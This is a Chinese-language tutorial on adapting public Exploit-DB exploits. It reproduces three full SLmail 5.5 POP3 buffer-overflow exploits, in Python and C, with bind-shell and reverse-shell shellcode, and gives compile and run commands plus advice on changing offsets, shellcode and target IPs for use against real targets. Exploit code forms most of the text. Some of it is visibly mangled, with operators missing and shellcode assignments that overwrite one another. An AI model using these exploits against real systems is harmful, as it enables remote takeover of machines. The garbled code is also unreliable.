exp的全称是exploit,也就是漏洞。现在的互联网上其实有很多公开的exp,可以进行参考使用。在找这些公开的exp时,最好选择可信赖的exp源,比较推荐的是这几个exp源:Exploit-db、SecurityFocus、Searhsploit。至于选择可信赖的exp源的理由,懂的都懂。

修改exp的方式很多,可以用python、java、C、C ...

前面介绍过SLmail v5.5版本的一个缓冲区溢出漏洞,我们查exploit-db其实也能找到攻击脚本:

如何修改exp目录(如何使用网上公开的exp)(1)

searchsploit slmail

脚本的位置都存放在/usr/share/exploitdb/exploits/目录下面:

如何修改exp目录(如何使用网上公开的exp)(2)

remote文件夹里的所有漏洞脚本

SLmail v5.5:638.py

先看一下638.py的内容:

######################################################### # # # SLmail 5.5 POP3 PASS Buffer Overflow # # Discovered by : Muts # # Coded by : Muts # # www.offsec.com # # Plain vanilla stack overflow in the PASS command # # # ######################################################### # D:\Projects\BO>SLmail-5.5-POP3-PASS.py # ######################################################### # D:\Projects\BO>nc -v 192.168.1.167 4444 # # localhost.lan [192.168.1.167] 4444 (?) open # # Microsoft Windows 2000 [Version 5.00.2195] # # (C) Copyright 1985-2000 Microsoft Corp. # # C:\Program Files\SLmail\System> # ######################################################### import struct import socket print "\n\n###############################################" print "\nSLmail 5.5 POP3 PASS Buffer Overflow" print "\nFound & coded by muts [at] offsec.com" print "\nFor Educational Purposes Only!" print "\n\n###############################################" s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) sc = "\xd9\xee\xd9\x74\x24\xf4\x5b\x31\xc9\xb1\x5e\x81\x73\x17\xe0\x66" sc = "\x1c\xc2\x83\xeb\xfc\xe2\xf4\x1c\x8e\x4a\xc2\xe0\x66\x4f\x97\xb6" sc = "\x31\x97\xae\xc4\x7e\x97\x87\xdc\xed\x48\xc7\x98\x67\xf6\x49\xaa" sc = "\x7e\x97\x98\xc0\x67\xf7\x21\xd2\x2f\x97\xf6\x6b\x67\xf2\xf3\x1f" sc = "\x9a\x2d\x02\x4c\x5e\xfc\xb6\xe7\xa7\xd3\xcf\xe1\xa1\xf7\x30\xdb" sc = "\x1a\x38\xd6\x95\x87\x97\x98\xc4\x67\xf7\xa4\x6b\x6a\x57\x49\xba" sc = "\x7a\x1d\x29\x6b\x62\x97\xc3\x08\x8d\x1e\xf3\x20\x39\x42\x9f\xbb" sc = "\xa4\x14\xc2\xbe\x0c\x2c\x9b\x84\xed\x05\x49\xbb\x6a\x97\x99\xfc" sc = "\xed\x07\x49\xbb\x6e\x4f\xaa\x6e\x28\x12\x2e\x1f\xb0\x95\x05\x61" sc = "\x8a\x1c\xc3\xe0\x66\x4b\x94\xb3\xef\xf9\x2a\xc7\x66\x1c\xc2\x70" sc = "\x67\x1c\xc2\x56\x7f\x04\x25\x44\x7f\x6c\x2b\x05\x2f\x9a\x8b\x44" sc = "\x7c\x6c\x05\x44\xcb\x32\x2b\x39\x6f\xe9\x6f\x2b\x8b\xe0\xf9\xb7" sc = "\x35\x2e\x9d\xd3\x54\x1c\x99\x6d\x2d\x3c\x93\x1f\xb1\x95\x1d\x69" sc = "\xa5\x91\xb7\xf4\x0c\x1b\x9b\xb1\x35\xe3\xf6\x6f\x99\x49\xc6\xb9" sc = "\xef\x18\x4c\x02\x94\x37\xe5\xb4\x99\x2b\x3d\xb5\x56\x2d\x02\xb0" sc = "\x36\x4c\x92\xa0\x36\x5c\x92\x1f\x33\x30\x4b\x27\x57\xc7\x91\xb3" sc = "\x0e\x1e\xc2\xf1\x3a\x95\x22\x8a\x76\x4c\x95\x1f\x33\x38\x91\xb7" sc = "\x99\x49\xea\xb3\x32\x4b\x3d\xb5\x46\x95\x05\x88\x25\x51\x86\xe0" sc = "\xef\xff\x45\x1a\x57\xdc\x4f\x9c\x42\xb0\xa8\xf5\x3f\xef\x69\x67" sc = "\x9c\x9f\x2e\xb4\xa0\x58\xe6\xf0\x22\x7a\x05\xa4\x42\x20\xc3\xe1" sc = "\xef\x60\xe6\xa8\xef\x60\xe6\xac\xef\x60\xe6\xb0\xeb\x58\xe6\xf0" sc = "\x32\x4c\x93\xb1\x37\x5d\x93\xa9\x37\x4d\x91\xb1\x99\x69\xc2\x88" sc = "\x14\xe2\x71\xf6\x99\x49\xc6\x1f\xb6\x95\x24\x1f\x13\x1c\xaa\x4d" sc = "\xbf\x19\x0c\x1f\x33\x18\x4b\x23\x0c\xe3\x3d\xd6\x99\xcf\x3d\x95" sc = "\x66\x74\x32\x6a\x62\x43\x3d\xb5\x62\x2d\x19\xb3\x99\xcc\xc2" #Tested on Win2k SP4 Unpatched # Change ret address if needed buffer = '\x41' * 4654 struct.pack('<L', 0x783d6ddf) '\x90'*32 sc try: print "\nSending evil buffer..." s.connect(('192.168.1.167',110)) data = s.recv(1024) s.send('USER username' '\r\n') data = s.recv(1024) s.send('PASS ' buffer '\r\n') data = s.recv(1024) s.close() print "\nDone! Try connecting to port 4444 on victim machine." except: print "Could not connect to POP3!" # milw0rm.com [2004-11-18]

需要注意的是这是很老的漏洞,所以这些攻击脚本也是比较早之前写的,所以使用的是python2,而不是现在主流的python3,如果你想直接使用这个demo,需要将python2的一些语法改成python3的语法。

最上面是一些注解,写了脚本的作用、作者、编写时间,还有一些类似免责申明之类的。

可以看到这个脚本和我们前面文章编写的脚本有些不同,这个脚本引入了一个struct模块,用于计算内存偏移量。还有缓冲区溢出的长度也和我们前面实战时的不一致,不清楚是以前的缓冲区溢出的逻辑和现在不一致,还是故意写错,避免有人直接使用这个demo脚本。目标机器的ip要修改成自己准备的目标ip。最后这个demo里使用的shellcode和我们使用的也不一样,这个shellcode的目的是将目标机器的4444端口打开,我们从外面可以直接去连接目标机器。

看这个脚本的编写时间2004-11-18,我怀疑那个时候大家的安全意识还比较差,对于正向连接的防护还没有现在这么全面。当前的互联网状态,在入侵的时候想要正向连接几乎不可能,所以我们只能参考这个demo的思路。

SLmail v5.5:646.c

646.c是C语言写的代码,先来看一下源码:

/* SLMAIL REMOTE passwd BOF - Ivan Ivanovic Ivanov Иван-дурак недействительный 31337 Team */ #include <string.h> #include <stdio.h> #include <winsock2.h> #include <windows.h> // [*] bind 4444 unsigned char shellcode[] = "\xfc\x6a\xeb\x4d\xe8\xf9\xff\xff\xff\x60\x8b\x6c\x24\x24\x8b\x45" "\x3c\x8b\x7c\x05\x78\x01\xef\x8b\x4f\x18\x8b\x5f\x20\x01\xeb\x49" "\x8b\x34\x8b\x01\xee\x31\xc0\x99\xac\x84\xc0\x74\x07\xc1\xca\x0d" "\x01\xc2\xeb\xf4\x3b\x54\x24\x28\x75\xe5\x8b\x5f\x24\x01\xeb\x66" "\x8b\x0c\x4b\x8b\x5f\x1c\x01\xeb\x03\x2c\x8b\x89\x6c\x24\x1c\x61" "\xc3\x31\xdb\x64\x8b\x43\x30\x8b\x40\x0c\x8b\x70\x1c\xad\x8b\x40" "\x08\x5e\x68\x8e\x4e\x0e\xec\x50\xff\xd6\x66\x53\x66\x68\x33\x32" "\x68\x77\x73\x32\x5f\x54\xff\xd0\x68\xcb\xed\xfc\x3b\x50\xff\xd6" "\x5f\x89\xe5\x66\x81\xed\x08\x02\x55\x6a\x02\xff\xd0\x68\xd9\x09" "\xf5\xad\x57\xff\xd6\x53\x53\x53\x53\x53\x43\x53\x43\x53\xff\xd0" "\x66\x68\x11\x5c\x66\x53\x89\xe1\x95\x68\xa4\x1a\x70\xc7\x57\xff" "\xd6\x6a\x10\x51\x55\xff\xd0\x68\xa4\xad\x2e\xe9\x57\xff\xd6\x53" "\x55\xff\xd0\x68\xe5\x49\x86\x49\x57\xff\xd6\x50\x54\x54\x55\xff" "\xd0\x93\x68\xe7\x79\xc6\x79\x57\xff\xd6\x55\xff\xd0\x66\x6a\x64" "\x66\x68\x63\x6d\x89\xe5\x6a\x50\x59\x29\xcc\x89\xe7\x6a\x44\x89" "\xe2\x31\xc0\xf3\xaa\xfe\x42\x2d\xfe\x42\x2c\x93\x8d\x7a\x38\xab" "\xab\xab\x68\x72\xfe\xb3\x16\xff\x75\x44\xff\xd6\x5b\x57\x52\x51" "\x51\x51\x6a\x01\x51\x51\x55\x51\xff\xd0\x68\xad\xd9\x05\xce\x53" "\xff\xd6\x6a\xff\xff\x37\xff\xd0\x8b\x57\xfc\x83\xc4\x64\xff\xd6" "\x52\xff\xd0\x68\xf0\x8a\x04\x5f\x53\xff\xd6\xff\xd0"; void exploit(int sock) { FILE *test; int *ptr; char userbuf[] = "USER madivan\r\n"; char evil[3001]; char buf[3012]; char receive[1024]; char nopsled[] = "\x90\x90\x90\x90\x90\x90\x90\x90" "\x90\x90\x90\x90\x90\x90\x90\x90"; memset(buf, 0x00, 3012); memset(evil, 0x00, 3001); memset(evil, 0x43, 3000); ptr = &evil; ptr = ptr 652; // 2608 memcpy(ptr, &nopsled, 16); ptr = ptr 4; memcpy(ptr, &shellcode, 317); *(long*)&evil[2600] = 0x7CB41010; // JMP ESP XP 7CB41020 FFE4 JMP ESP // banner recv(sock, receive, 200, 0); printf("[ ] %s", receive); // user printf("[ ] Sending Username...\n"); send(sock, userbuf, strlen(userbuf), 0); recv(sock, receive, 200, 0); printf("[ ] %s", receive); // passwd printf("[ ] Sending Evil buffer...\n"); sprintf(buf, "PASS %s\r\n", evil); //test = fopen("test.txt", "w"); //fprintf(test, "%s", buf); //fclose(test); send(sock, buf, strlen(buf), 0); printf("[*] Done! Connect to the host on port 4444...\n\n"); } int connect_target(char *host, u_short port) { int sock = 0; struct hostent *hp; WSADATA wsa; struct sockaddr_in sa; WSAStartup(MAKEWORD(2,0), &wsa); memset(&sa, 0, sizeof(sa)); hp = gethostbyname(host); if (hp == NULL) { printf("gethostbyname() error!\n"); exit(0); } printf("[ ] Connecting to %s\n", host); sa.sin_family = AF_INET; sa.sin_port = htons(port); sa.sin_addr = **((struct in_addr **) hp->h_addr_list); sock = socket(AF_INET, SOCK_STREAM, 0); if (sock < 0) { printf("[-] socket blah?\n"); exit(0); } if (connect(sock, (struct sockaddr *) &sa, sizeof(sa)) < 0) {printf("[-] connect() blah!\n"); exit(0); } printf("[ ] Connected to %s\n", host); return sock; } int main(int argc, char **argv) { int sock = 0; int data, port; printf("\n[$] SLMail Server POP3 PASSWD Buffer Overflow exploit\n"); printf("[$] by Mad Ivan [ void31337 team ] - http://exploit.void31337.ru\n\n"); if ( argc < 2 ) { printf("usage: slmail-ex.exe <host> \n\n"); exit(0); } port = 110; sock = connect_target(argv[1], port); exploit(sock); closesocket(sock); return 0; }

这个.c的文件是不能直接执行,需要编译成二进制的执行程序才能执行,但是看最上面的几个include可以知道,它引用了几个模块,其中winsock2.h和windows.h是windows下c编译环境会用到的模块。

如果你是在Linux环境编译,且没安装过winsock2.h和windows.h,就会和我一样,编译失败,提示缺什么模块:

如何修改exp目录(如何使用网上公开的exp)(3)

gcc 646.c -o 646

Kali默认是没有集成这些模块的,需要自己手动安装,安装过程会比较麻烦,第一个需要安装mingw-w64,因为我是64位的系统,所以安装的是这个,如果你是32位的系统,就需要安装mingw32。mingw-w64这个的作用是让你可以在Linux环境下编译Windows环境下的程序。

如何修改exp目录(如何使用网上公开的exp)(4)

apt install mingw-w64

如果安装失败的话,可以试试切换/etc/apt/sources.list里面的仓库地址,换成阿里云或者中科大的,反正多换几个,总能遇到一个正常稳定的。

安装完mingw-w64只是具备了编译条件,但是想要执行还需要安装win64:

如何修改exp目录(如何使用网上公开的exp)(5)

apt install wine64

安装完成后,先进行编译:

如何修改exp目录(如何使用网上公开的exp)(6)

i686-w64-mingw32-gcc 646.c -lws2_32 -o sl.exe

不再使用预装的那个gcc编译,随便编译过程会有报错,但是sl.exe文件已经生成了。

这个sl.exe文件是个标准的Windows环境可执行程序,可以移动到Windows环境下双击进行执行,也可以在Linux环境下通过前面安装的工具进行执行,不过我的kali的环境还是有点问题,直接到Windows环境执行了:

如何修改exp目录(如何使用网上公开的exp)(7)

sl.exe 192.168.0.11

通过看646.c的源码可以知道,执行时需要传入一个目标机器的ip。由于我没有启动目标机器,所以执行结果显示连接失败。

如果你准备使用这个646.c的demo,记得去改一下跳转的内存地址,还有shellcode,这个demo里的shellcode应该也是正向连接的,和前面的638.py一样。

SLmail v5.5:643.c

先来看一下源码:

#include <fcntl.h> #include <stdio.h> #include <stdlib.h> #include <sys/socket.h> #include <sys/types.h> #include <sys/wait.h> #include <errno.h> #include <netinet/in.h> #include <netdb.h> #include <string.h> #define retadd "\x9f\x45\x3a\x77" /*win2k server sp4 0x773a459f*/ #define port 110 /* revshell العراق القراصنة المجموعة*/ char shellcode[] = "\xfc\x6a\xeb\x4d\xe8\xf9\xff\xff\xff\x60\x8b\x6c\x24\x24\x8b\x45" "\x3c\x8b\x7c\x05\x78\x01\xef\x8b\x4f\x18\x8b\x5f\x20\x01\xeb\x49" "\x8b\x34\x8b\x01\xee\x31\xc0\x99\xac\x84\xc0\x74\x07\xc1\xca\x0d" "\x01\xc2\xeb\xf4\x3b\x54\x24\x28\x75\xe5\x8b\x5f\x24\x01\xeb\x66" "\x8b\x0c\x4b\x8b\x5f\x1c\x01\xeb\x03\x2c\x8b\x89\x6c\x24\x1c\x61" "\xc3\x31\xdb\x64\x8b\x43\x30\x8b\x40\x0c\x8b\x70\x1c\xad\x8b\x40" "\x08\x5e\x68\x8e\x4e\x0e\xec\x50\xff\xd6\x66\x53\x66\x68\x33\x32" "\x68\x77\x73\x32\x5f\x54\xff\xd0\x68\xcb\xed\xfc\x3b\x50\xff\xd6" "\x5f\x89\xe5\x66\x81\xed\x08\x02\x55\x6a\x02\xff\xd0\x68\xd9\x09" "\xf5\xad\x57\xff\xd6\x53\x53\x53\x53\x43\x53\x43\x53\xff\xd0\x68" "\x7f\x00\x00\x01\x66\x68\x10\xe1\x66\x53\x89\xe1\x95\x68\xec\xf9" "\xaa\x60\x57\xff\xd6\x6a\x10\x51\x55\xff\xd0\x66\x6a\x64\x66\x68" "\x63\x6d\x6a\x50\x59\x29\xcc\x89\xe7\x6a\x44\x89\xe2\x31\xc0\xf3" "\xaa\x95\x89\xfd\xfe\x42\x2d\xfe\x42\x2c\x8d\x7a\x38\xab\xab\xab" "\x68\x72\xfe\xb3\x16\xff\x75\x28\xff\xd6\x5b\x57\x52\x51\x51\x51" "\x6a\x01\x51\x51\x55\x51\xff\xd0\x68\xad\xd9\x05\xce\x53\xff\xd6" "\x6a\xff\xff\x37\xff\xd0\x68\xe7\x79\xc6\x79\xff\x75\x04\xff\xd6" "\xff\x77\xfc\xff\xd0\x68\xf0\x8a\x04\x5f\x53\xff\xd6\xff\xd0"; struct sockaddr_in plm,lar,target; int conn(char *ip) { int sockfd; plm.sin_family = AF_INET; plm.sin_port = htons(port); plm.sin_addr.s_addr = inet_addr(ip); bzero(&(plm.sin_zero),8); sockfd = socket(AF_INET,SOCK_STREAM,0); if((connect(sockfd,(struct sockaddr *)&plm,sizeof(struct sockaddr))) < 0) { perror("[-] connect error!"); exit(0); } printf("[*] Connected to: %s.\n",ip); return sockfd; } int main(int argc, char *argv[]) { int xs; char out[1024]; char *buffer = malloc(2960); memset(buffer, 0x00, 2960); char *off = malloc(2606); memset(off, 0x00, 2606); memset(off, 0x41, 2605); char *nop = malloc(13); memset(nop, 0x00, 13); memset(nop, 0x90, 12); strcat(buffer, off); strcat(buffer, retadd); strcat(buffer, nop); strcat(buffer, shellcode); printf("[ ] SLMAIL Remote buffer overflow exploit in POP3 PASS by Haroon Rashid Astwat.\n"); xs = conn("192.168.224.144"); read(xs, out, 1024); printf("[*] %s", out); write(xs,"USER username\r\n", 15); read(xs, out, 1024); printf("[*] %s", out); write(xs,"PASS ",5); write(xs,buffer,strlen(buffer)); printf("Shellcode len: %d bytes\n",strlen(shellcode)); printf("Buffer len: %d bytes\n",strlen(buffer)); write(xs,"\r\n",4); close(xs); }

从顶部的include众多模块看,这个脚本是没有引用任何Windows相关的模块的。编译这个643.c文件后就能生成一个Linux环境下执行的程序。

从643.c代码中的注解说明可以知道这个代码中使用的shellcode也是反向连接的,646.c中自带的shellcode是正向连接的。虽然643.c是反向连接,但是攻击机的ip地址已经被写入了shellcode,所以代码里的shellcode也是不能直接使用的。代码中的内存偏移量、目标机器ip都是需要根据自己的测试结果进行调整的。

根据实际情况修改了代码后,就可以直接编译了:

如何修改exp目录(如何使用网上公开的exp)(8)

gcc 643.c -o 643

编译过程会有很多warning,可以不管,如果你真的有强迫症,就查一下缺了什么模块,加到代码文件头部,通过include进行添加就可以解决这些warning。

编译出来的文件,检查是否有可执行权限,如果没有就通过chmod加权限,执行方式和执行shell脚本一样。

总结

看了上面几个exploit-db提供的几个例子,应该能体会到,这些demo其实都不能直接使用的。会导致这样现象的原因其实也很简单,因为不同的系统补丁,软件版本,都会造成内存偏移量的不同,通过修改公开的EXP满足不同的环境需要。所以要配合扫描技术,发现目标系统的版本,搭建适当的测试环境,才能针对目标系统进行漏洞利用,达到最终想要的效果。

,